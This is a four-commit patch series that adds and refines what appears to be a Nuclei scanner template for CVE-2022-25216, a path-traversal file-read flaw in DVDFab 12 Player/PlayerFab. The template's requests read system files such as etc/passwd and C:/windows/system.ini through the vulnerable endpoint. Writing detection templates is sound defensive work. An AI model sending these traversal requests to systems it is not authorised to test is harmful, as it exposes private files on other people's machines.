From 3606a2f6d58ecd98d4fef799d43ef2aa874b364f Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 13 Apr 2022 09:33:44 +0900 Subject: [PATCH 1/4] Create CVE-2022-25216.yaml --- CVE-2022-25216.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 CVE-2022-25216.yaml diff --git a/CVE-2022-25216.yaml b/CVE-2022-25216.yaml new file mode 100644 index 0000000000..e4e75105f5 --- /dev/null +++ b/CVE-2022-25216.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-25216 + +info: + name: Arbitrary File Read in DVDFab 12 Player/PlayerFab + author: 0x_Akoko + severity: high + description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access + reference: + - https://www.cvedetails.com/cve/CVE-2022-25216 + - https://www.tenable.com/security/research/tra-2022-07 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-25216 + cwe-id: CWE-22 + tags: cve,cve2022,dvdFab,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd" + - "{{BaseURL}}/interlib/report/ShowImage?localPath=C%3a%2fwindows%2fsystem.ini" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + + - type: status + status: + - 200 From 56aaa33a7b7439f466be6604b18e5121a42528ea Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Apr 2022 12:33:01 +0400 Subject: [PATCH 2/4] Update and rename CVE-2022-25216.yaml to cves/2022/CVE-2022-25216.yaml --- .../2022/CVE-2022-25216.yaml | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) rename CVE-2022-25216.yaml => cves/2022/CVE-2022-25216.yaml (79%) diff --git a/CVE-2022-25216.yaml b/cves/2022/CVE-2022-25216.yaml similarity index 79% rename from CVE-2022-25216.yaml rename to cves/2022/CVE-2022-25216.yaml index e4e75105f5..39e23aeccf 100644 --- a/CVE-2022-25216.yaml +++ b/cves/2022/CVE-2022-25216.yaml @@ -6,30 +6,32 @@ info: severity: high description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access reference: - - https://www.cvedetails.com/cve/CVE-2022-25216 - https://www.tenable.com/security/research/tra-2022-07 + - https://www.cvedetails.com/cve/CVE-2022-25216 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25216 cwe-id: CWE-22 tags: cve,cve2022,dvdFab,lfi - + requests: - method: GET path: - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd" - "{{BaseURL}}/interlib/report/ShowImage?localPath=C%3a%2fwindows%2fsystem.ini" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and - type: regex regex: - - "root:.*:0:0:" - - "for 16-bit app support" - condition: or - - - type: status - status: - - 200 + - "root:[x*]:0:0:" From 62bf35c347ac263fb2c689c4db5f3ed1ace4b3e5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Apr 2022 13:00:24 +0400 Subject: [PATCH 3/4] Update CVE-2022-25216.yaml --- cves/2022/CVE-2022-25216.yaml | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/cves/2022/CVE-2022-25216.yaml b/cves/2022/CVE-2022-25216.yaml index 39e23aeccf..6aa7c81f71 100644 --- a/cves/2022/CVE-2022-25216.yaml +++ b/cves/2022/CVE-2022-25216.yaml @@ -1,7 +1,7 @@ id: CVE-2022-25216 info: - name: Arbitrary File Read in DVDFab 12 Player/PlayerFab + name: DVDFab 12 Player/PlayerFab - Arbitrary File Read author: 0x_Akoko severity: high description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access @@ -13,16 +13,14 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25216 cwe-id: CWE-22 - tags: cve,cve2022,dvdFab,lfi + tags: cve,cve2022,dvdFab,lfi,lfr requests: - method: GET path: - - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd" - - "{{BaseURL}}/interlib/report/ShowImage?localPath=C%3a%2fwindows%2fsystem.ini" + - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini" - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word part: body @@ -32,6 +30,6 @@ requests: - "extensions" condition: and - - type: regex - regex: - - "root:[x*]:0:0:" + - type: status + status: + - 200 From da1d31c0abc3c61371153f97e5857b2334b0e910 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Apr 2022 13:22:19 +0400 Subject: [PATCH 4/4] Update CVE-2022-25216.yaml --- cves/2022/CVE-2022-25216.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25216.yaml b/cves/2022/CVE-2022-25216.yaml index 6aa7c81f71..adef971fa1 100644 --- a/cves/2022/CVE-2022-25216.yaml +++ b/cves/2022/CVE-2022-25216.yaml @@ -1,7 +1,7 @@ id: CVE-2022-25216 info: - name: DVDFab 12 Player/PlayerFab - Arbitrary File Read + name: DVDFab 12 Player/PlayerFab - Arbitrary File Read author: 0x_Akoko severity: high description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access